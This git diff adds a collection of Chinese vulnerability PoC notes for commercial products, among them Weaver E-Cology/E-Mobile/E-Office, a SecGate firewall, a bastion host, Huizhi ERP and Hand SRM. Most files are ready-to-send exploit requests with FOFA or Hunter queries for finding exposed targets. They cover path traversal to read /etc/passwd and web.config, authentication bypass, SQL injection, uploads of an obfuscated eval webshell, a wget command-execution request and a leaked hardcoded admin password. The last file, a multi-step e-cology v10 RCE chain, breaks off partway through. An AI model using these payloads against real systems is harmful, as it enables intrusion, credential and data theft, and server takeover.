diff --git a/某盟-SAS堡垒机-漏洞.md b/某盟-SAS堡垒机-漏洞.md
new file mode 100644
index 0000000..6dbeb96
--- /dev/null
+++ b/某盟-SAS堡垒机-漏洞.md
@@ -0,0 +1,29 @@
+## 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞
+```
+
+GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
+Host: 1.1.1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+## 某盟 SAS堡垒机 GetFile 任意文件读取漏洞
+```
+GET /webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: 1.1.1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+## 某盟 SAS堡垒机 Exec 远程命令执行漏洞 
+```
+GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
+Host: 1.1.1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Connection: close
+```
diff --git a/某短视频系统视频知识付费系统存在前台任意文件读取漏洞.md b/某短视频系统视频知识付费系统存在前台任意文件读取漏洞.md
new file mode 100644
index 0000000..958c412
--- /dev/null
+++ b/某短视频系统视频知识付费系统存在前台任意文件读取漏洞.md
@@ -0,0 +1,30 @@
+# 某短视频系统视频知识付费系统存在前台任意文件读取漏洞
+
+某短视频系统视频知识付费系统存在前台任意文件读取漏洞
+
+## fofa
+
+```javascript
+"testvideo://login?id="
+```
+
+## poc
+
+```javascript
+GET /index/index/request_by_curl?remote_server=file:///etc/passwd&post_string=1 HTTP/1.1
+Host: 127.0.0.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112200410.webp)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/e0IJDC4365lBu5XiWz93Gw
\ No newline at end of file
diff --git a/某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞.md b/某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞.md
new file mode 100644
index 0000000..044f0af
--- /dev/null
+++ b/某神-SecGate-3600-防火墙-obj_app_upfile-任意文件上传漏洞.md
@@ -0,0 +1,32 @@
+## 某神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
+```
+POST /?g=obj_app_upfile HTTP/1.1
+Host: x.x.x.x
+Accept: /
+Accept-Encoding: gzip, deflate
+Content-Length: 574
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
+User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
+
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+10000000
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
+Content-Type: text/plain
+
+<?php php马?>
+
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="submit_post"
+
+obj_app_upfile
+------WebKitFormBoundaryJpMyThWnAxbcBBQc
+Content-Disposition: form-data; name="__hash__"
+
+0b9d6b1ab7479ab69d9f71b05e0e9445
+------WebKitFormBoundaryJpMyThWnAxbcBBQc--
+
+马儿路径：attachements/xxx.php
+```
diff --git a/某联达oa-后台文件上传漏洞.md b/某联达oa-后台文件上传漏洞.md
new file mode 100644
index 0000000..08c25d2
--- /dev/null
+++ b/某联达oa-后台文件上传漏洞.md
@@ -0,0 +1,32 @@
+## 某联达oa 后台文件上传漏洞
+```
+POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
+Host: 10.10.10.1:8888
+X-Requested-With: Ext.basex
+Accept: text/html, application/xhtml+xml, image/jxr, /
+Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: /
+Origin: http://10.10.10.1
+Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
+Cookie: 
+Connection: close
+Content-Length: 421
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
+Content-Type: application/text
+
+<%@ Page Language="Jscript" Debug=true%>
+<%
+var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
+var GFMA=Request.Form("qmq1");
+var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
+eval(GFMA, ONOQ);
+%>
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+
+```
diff --git a/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md b/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md
new file mode 100644
index 0000000..aa01e1e
--- /dev/null
+++ b/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md
@@ -0,0 +1,49 @@
+# 正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞
+
+正方软件股份有限公司移动信息服务管理平台存在任意文件上传漏洞。攻击者可通过任意文件上传获取服务器权限。
+
+## fofa
+
+```yaml
+title="移动信息服务管理" || body="URL=/zftal-mobile"
+```
+
+## poc
+
+```java
+POST /zftal-mobile/oaMobile/oaMobile_fjUploadByType.html HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.1707.77 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
+Accept: */*
+Content-Length: 457
+
+------WebKitFormBoundary7MA4YWxkTrZu0gW
+Content-Disposition: form-data; name="yhm"
+
+123
+------WebKitFormBoundary7MA4YWxkTrZu0gW
+Content-Disposition: form-data; name="zid"
+
+456
+------WebKitFormBoundary7MA4YWxkTrZu0gW
+Content-Disposition: form-data; name="sign"
+
+789
+------WebKitFormBoundary7MA4YWxkTrZu0gW
+Content-Disposition: form-data; name="file"; filename="409.jsp"
+Content-Type: text/plain
+
+111
+------WebKitFormBoundary7MA4YWxkTrZu0gW--
+```
+
+文件路径
+
+` /zftal-mobile/oaFjUploadByType/409.jsp`
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/WrDhyx3wOdwMvSwkF-sXOQ
\ No newline at end of file
diff --git a/汇智ERPfilehandle存在任意文件读取漏洞.md b/汇智ERPfilehandle存在任意文件读取漏洞.md
new file mode 100644
index 0000000..7a3f515
--- /dev/null
+++ b/汇智ERPfilehandle存在任意文件读取漏洞.md
@@ -0,0 +1,41 @@
+# 汇智ERP filehandle存在任意文件读取漏洞
+
+# 一、漏洞简介
+汇智ERP是一款由江阴汇智软件技术有限公司开发的企业资源规划（ERP）软件，旨在通过信息化手段帮助企业优化业务流程，提升管理效率，增强综合竞争力。适用于各类企业，包括大型企业、中小型企业以及集团化企业。根据企业规模和业务需求，汇智ERP提供了不同的版本（如集团版和标准版），以满足企业的个性化需求。汇智ERP filehandle存在任意文件读取漏洞
+
+# 二、影响版本
++ 汇智ERP
+
+# 三、资产测绘
++ fofa`icon_hash="-642591392"`
++ 特征
+
+![1721894686519-5cc4f9a9-8678-47d5-9542-2110734d50f0.png](./img/LRh-q9BuPwVokhJN/1721894686519-5cc4f9a9-8678-47d5-9542-2110734d50f0-978003.png)
+
+# 四、漏洞复现
+```plain
+GET /nssys/common/filehandle.aspx?filepath=C%3a%2fwindows%2fwin%2eini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![1721894837449-b25e1e44-568b-4cd8-8659-aa625a784dbd.png](./img/LRh-q9BuPwVokhJN/1721894837449-b25e1e44-568b-4cd8-8659-aa625a784dbd-669353.png)
+
+```plain
+GET /nssys/common/filehandle.aspx?filepath=../../web.config HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![1721894900847-10896155-e4aa-4f6a-a3e3-cb71ee6773de.png](./img/LRh-q9BuPwVokhJN/1721894900847-10896155-e4aa-4f6a-a3e3-cb71ee6773de-934998.png)
+
+
+
+> 更新: 2024-08-12 17:29:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rpkrxscac0dp5hda>
\ No newline at end of file
diff --git a/汇智ERP系统Upload.aspx存在文件上传漏洞.md b/汇智ERP系统Upload.aspx存在文件上传漏洞.md
new file mode 100644
index 0000000..3d62979
--- /dev/null
+++ b/汇智ERP系统Upload.aspx存在文件上传漏洞.md
@@ -0,0 +1,62 @@
+# 汇智ERP系统Upload.aspx存在文件上传漏洞
+
+汇智企业资源管理系统Upload.aspx存在文件上传漏洞，攻击者可未授权上传webshell木马文件获取服务器权限。
+
+## fofa
+
+```yaml
+icon_hash="-642591392"
+```
+
+## poc
+
+```java
+POST /nssys/common/Upload.aspx?Action=DNPageAjaxPostBack HTTP/1.1
+Host: 
+Content-Length: 1033
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryLkkAXATqVKBHZ8zk
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+/wEPDwUJOTc0NzkxMzQ1D2QWAgIDDxYGHhdJc0JlZm9yZU9wZXJhdGVTYXZlRGF0YWgeBmlzZ3VpZAUBMR4OY2hlY2tmb3Jtc3RhdGUFATBkZHwobq1hNj9MTgjOtrIn/0gbCdhD
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+573D6CFB
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="upfile_Input"
+
+
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="upfile_upload"; filename="1"
+Content-Type: image/jpeg
+
+<!DOCTYPE html>
+<html>
+<head>
+    <title>ASP.NET Web Forms Example</title>
+</head>
+<body>
+    <%@ Page Language="C#" %>
+    <% Response.Write("hello,world"); %>
+</body>
+</html>
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="upfilename"
+
+2.aspx
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="dnpostmethodname"
+
+uploadfile
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk--
+```
+
diff --git a/汉得SRM-tomcat.jsp-登录绕过漏洞.md b/汉得SRM-tomcat.jsp-登录绕过漏洞.md
new file mode 100644
index 0000000..a1cde20
--- /dev/null
+++ b/汉得SRM-tomcat.jsp-登录绕过漏洞.md
@@ -0,0 +1,6 @@
+## 汉得SRM tomcat.jsp 登录绕过漏洞
+```
+/tomcat.jsp?dataName=role_id&dataValue=1
+/tomcat.jsp?dataName=user_id&dataValue=1
+```
+然后访问后台：/main.screen
diff --git a/汉得SRMtomcat.jsp登录绕过漏洞.md b/汉得SRMtomcat.jsp登录绕过漏洞.md
new file mode 100644
index 0000000..507e4ed
--- /dev/null
+++ b/汉得SRMtomcat.jsp登录绕过漏洞.md
@@ -0,0 +1,37 @@
+# 汉得SRM tomcat.jsp 登录绕过漏洞
+
+# 一、漏洞简介
+汉得SRM云是面向企业采购流程信息化建设的完整解决方案。基于汉得供应商关系管理体系在战略寻源与集中采购、供应链协同和优益采购三大采购管理领域的成功实践，形成了深度契合业务实体的三项组件级解决方案。汉得SRM tomcat.jsp 存在登录绕过漏洞，可绕过身份认证登录后台。
+
+# 二、影响版本
++ 汉得 SRM云平台（Going-Link）
+
+# 三、资产测绘
++ hunter：`app.name="汉得 SRM Going-Link"`
+
+![1691633444395-128795bc-eda8-404c-956d-8147631e5f4f.png](./img/zp0A_yg2AV9HVCoP/1691633444395-128795bc-eda8-404c-956d-8147631e5f4f-852592.png)
+
++ 登录页面
+
+![1691633633657-ce37893e-1008-4ebd-ba12-5829debf3f3a.png](./img/zp0A_yg2AV9HVCoP/1691633633657-ce37893e-1008-4ebd-ba12-5829debf3f3a-412386.png)
+
+# 四、漏洞复现
+1. 访问`tomct.jsp`
+
+```java
+/tomcat.jsp?dataName=role_id&dataValue=1
+/tomcat.jsp?dataName=user_id&dataValue=1
+```
+
+![1691634374117-f33fbea4-fb74-4443-a8a1-077e4fa58158.png](./img/zp0A_yg2AV9HVCoP/1691634374117-f33fbea4-fb74-4443-a8a1-077e4fa58158-644860.png)
+
+![1691634393767-677fb789-042e-4e9a-ab69-69f7ba82f2d0.png](./img/zp0A_yg2AV9HVCoP/1691634393767-677fb789-042e-4e9a-ab69-69f7ba82f2d0-860506.png)
+
+2. 然后访问后台`<font style="color:rgba(0, 0, 0, 0.9);">/main.screen</font>`
+
+![1691634449862-e80411bc-7175-4b3b-b099-744552207362.png](./img/zp0A_yg2AV9HVCoP/1691634449862-e80411bc-7175-4b3b-b099-744552207362-749194.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kb4n0lalk008g50l>
\ No newline at end of file
diff --git a/江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞.md b/江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞.md
new file mode 100644
index 0000000..5225718
--- /dev/null
+++ b/江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞.md
@@ -0,0 +1,31 @@
+# 江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞
+
+# 一、漏洞简介
+江西云本数字科技有限公司总部设立于英雄城南昌，拥有原江西华兴信息产业科技有限公司的原班团队，拥有10年以上的研发、生产、销售智能化公交电子站牌的公交系统服务经验。江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞。
+
+# 二、影响版本
++ 云出行后台管理系统
+
+# 三、资产测绘
++ hunter`web.body="云出行后台管理系统"`
++ 特征
+
+![1709867048534-9c791fbf-307d-4514-90eb-f3741ebb4f60.png](./img/wM-ryvOuyAthJJh_/1709867048534-9c791fbf-307d-4514-90eb-f3741ebb4f60-236876.png)
+
+# 四、漏洞复现
+```plain
+/doc/
+```
+
+![1709867105816-9f04725c-4813-477f-96e9-1833288e2a63.png](./img/wM-ryvOuyAthJJh_/1709867105816-9f04725c-4813-477f-96e9-1833288e2a63-679337.png)
+
+```plain
+/v1/api-docs
+```
+
+![1709867173481-02a720bf-9ecc-4855-9e3e-1ad50affe44c.png](./img/wM-ryvOuyAthJJh_/1709867173481-02a720bf-9ecc-4855-9e3e-1ad50affe44c-569884.png)
+
+
+
+> 更新: 2024-03-13 23:54:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pheadzhwmwz319mg>
\ No newline at end of file
diff --git a/泛微-HrmCareerApplyPerView-sql注入漏洞.md b/泛微-HrmCareerApplyPerView-sql注入漏洞.md
new file mode 100644
index 0000000..a10da5d
--- /dev/null
+++ b/泛微-HrmCareerApplyPerView-sql注入漏洞.md
@@ -0,0 +1,10 @@
+## 泛微 HrmCareerApplyPerView sql注入漏洞
+```
+GET
+/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
+Host: 127.0.0.1:7443
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
+Accept-Encoding: gzip, deflate
+Connection: close
+
+```
diff --git a/泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md b/泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md
new file mode 100644
index 0000000..3681a1a
--- /dev/null
+++ b/泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞
+
+由于泛微E-Cology9 weaver.formmode.servelt.QRcodeBuildAction接口未对用户传入的数据进行严格的校验和过滤，导致攻击者利用多层编码的方式绕过身份认证进行SQL注入。
+
+## fofa
+
+```javascript
+ app="泛微-OA（e-cology）"
+```
+
+## poc
+
+注入点为modeid并且每注入一次就需要更换参数值
+
+```javascript
+POST /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+modeid=127+WAITFOR+DELAY+'0%3a0%3a5'
+```
+
+sqlmap利用方式：https://blog.csdn.net/qq_41904294/article/details/131666128
diff --git a/泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞.md b/泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞.md
new file mode 100644
index 0000000..f1378b3
--- /dev/null
+++ b/泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞
+
+泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞，可获取数据库权限，导致数据泄露。
+
+## fofa
+
+```javascript
+app="泛微-OA（e-cology）"
+```
+
+## poc
+
+```javascript
+GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1# HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241012130802172](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121308238.png)
\ No newline at end of file
diff --git a/泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md b/泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md
new file mode 100644
index 0000000..b326f3d
--- /dev/null
+++ b/泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md
@@ -0,0 +1,19 @@
+# 泛微E-Mobile硬编码口令漏洞(XVE-2024-28095)
+
+泛微E-Mobile 存在硬编码口令漏洞，未经身份验证的远程攻击者可利用该口令以超级管理员身份登录管理后台，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+app="泛微-EMobile"
+```
+
+## poc
+
+```javascript
+账号：msgadmin
+密码：Weaver#2012!@#
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272003506.png)
+
diff --git a/泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞.md b/泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞.md
new file mode 100644
index 0000000..8b9218d
--- /dev/null
+++ b/泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞
+
+泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等。
+
+## fofa
+
+```javascript
+app="泛微-EMobile"
+```
+
+## poc
+
+```javascript
+GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+```javascript
+GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20240919111430590](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191114676.png)
\ No newline at end of file
diff --git a/泛微E-Office9文件上传漏洞(CVE-2023-2523).md b/泛微E-Office9文件上传漏洞(CVE-2023-2523).md
new file mode 100644
index 0000000..fab2f71
--- /dev/null
+++ b/泛微E-Office9文件上传漏洞(CVE-2023-2523).md
@@ -0,0 +1,37 @@
+## 泛微E-Office9文件上传漏洞(CVE-2023-2523)
+
+## fofa
+
+```javascript
+app="泛微-EOffice"
+```
+
+## poc
+```javascript
+POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
+Host: 
+Content-Length: 349
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: null
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
+Connection: close
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+Content-Disposition: form-data; name="upload_quwan"; filename="1.phP"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
+```
+
+![泛微 E-Office_v9.5 mobile_upload_save接口任意文件上传漏洞 POC](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031020316.png)
diff --git a/泛微e-Mobile移动管理平台error存在远程命令执行漏洞.md b/泛微e-Mobile移动管理平台error存在远程命令执行漏洞.md
new file mode 100644
index 0000000..4db702d
--- /dev/null
+++ b/泛微e-Mobile移动管理平台error存在远程命令执行漏洞.md
@@ -0,0 +1,22 @@
+# 泛微e-Mobile移动管理平台error存在远程命令执行漏洞
+
+泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具，使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台error在远程命令执行漏洞。
+
+## hunter
+```javascript
+app.name="泛微 e-Mobile 移动管理平台"
+```
+
+## poc
+```plain
+GET /client/common/error?a=whoami HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1728540551926-c7e783ce-3810-40b8-a311-536332c7ccab.png)
+
diff --git a/泛微e-cology-v10远程代码执行漏洞.md b/泛微e-cology-v10远程代码执行漏洞.md
new file mode 100644
index 0000000..bbcb58d
--- /dev/null
+++ b/泛微e-cology-v10远程代码执行漏洞.md
@@ -0,0 +1,114 @@
+# 泛微e-cology-v10远程代码执行漏洞
+
+通过e-cology-10.0的/papi/passport/rest/appThirdLogin接口传入管理员账号信息获取票据，系统依赖 H2 数据库且有 JDBC 反序列化漏洞。
+
+## fofa
+
+```yaml
+app="泛微-OA（e-cology）"
+```
+
+## poc
+
+### 获取serviceTicketId
+
+```yaml
+POST /papi/passport/rest/appThirdLogin HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 51
+
+username=sysadmin&service=1&ip=1&loginType=third
+
+
+----
+HTTP/1.1 200 OK
+Server: ******
+Content-Type: application/json;charset=UTF-8
+Connection: keep-alive
+Date: Tue, 20 Aug 2024 08:39:09 GMT
+traceId: f377fe57-0a32-42e8-80f8-91178393ca96
+Set-Cookie: ETEAMS_TGC=TGT521-0L9GdBeMWxijLGMwbnRPEATrA9cHd9pvbaQ4sjcKA9EIgY5cBx; Path=/
+Access-Control-Allow-Headers: X-CSRFToken,Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With,X-File-Name,i18n,token,appkey,userName,password,sw8,eteamsid,traceid,langType,timezoneoffset,authtoken,signature,enableTrans,routePath,tranceid,currentUrl,ebbusinessid,ebBusinessId
+Access-Control-Max-Age: 86400
+X-XSS-Protection: 1
+X-Content-Type-Options: nosniff
+Content-Length: 179
+
+{"success":"true","serviceTicketId":"ST-591-hEd3zpL4xVLMTe9hJ0wR-http://10.0.0.1","message":"登录成功","tgtId":"TGT521-0L9GdBeMWxijLGMwbnRPEATrA9cHd9pvbaQ4sjcKA9EIgY5cBx"}
+```
+
+### 获取ETEAMSID
+
+```java
+POST /papi/passport/login/generateEteamsId HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 56
+
+stTicket=ST-591-hEd3zpL4xVLMTe9hJ0wR-http://10.0.0.1
+
+
+----
+HTTP/1.1 200 OK
+Server: ******
+Content-Type: application/json;charset=UTF-8
+Connection: keep-alive
+Date: Tue, 20 Aug 2024 08:41:51 GMT
+traceId: d7c16568-6727-4dab-bb87-e8f77ac37703
+Access-Control-Allow-Headers: X-CSRFToken,Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With,X-File-Name,i18n,token,appkey,userName,password,sw8,eteamsid,traceid,langType,timezoneoffset,authtoken,signature,enableTrans,routePath,tranceid,currentUrl,ebbusinessid,ebBusinessId
+Access-Control-Max-Age: 86400
+X-XSS-Protection: 1
+X-Content-Type-Options: nosniff
+Content-Length: 114
+
+{"code":200,"msg":"接口返回成功","status":true,"data":"THIRD_def423a1574e66bbdb29bc647cd8ccf6","fail":false}
+```
+
+### 加载org.h2.Driver
+
+```java
+POST /api/bs/iaauthclient/base/save HTTP/1.1
+Host: 
+Content-Length: 86
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Content-Type: application/json
+Accept: */*
+Origin: http://ip
+Referer: http://ip/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+ETEAMSID: THIRD_def423a1574e66bbdb29bc647cd8ccf6
+
+{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}
+```
+
+### 执行命令
+
+```
+POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1
+Host: 
+Content-Length: 199
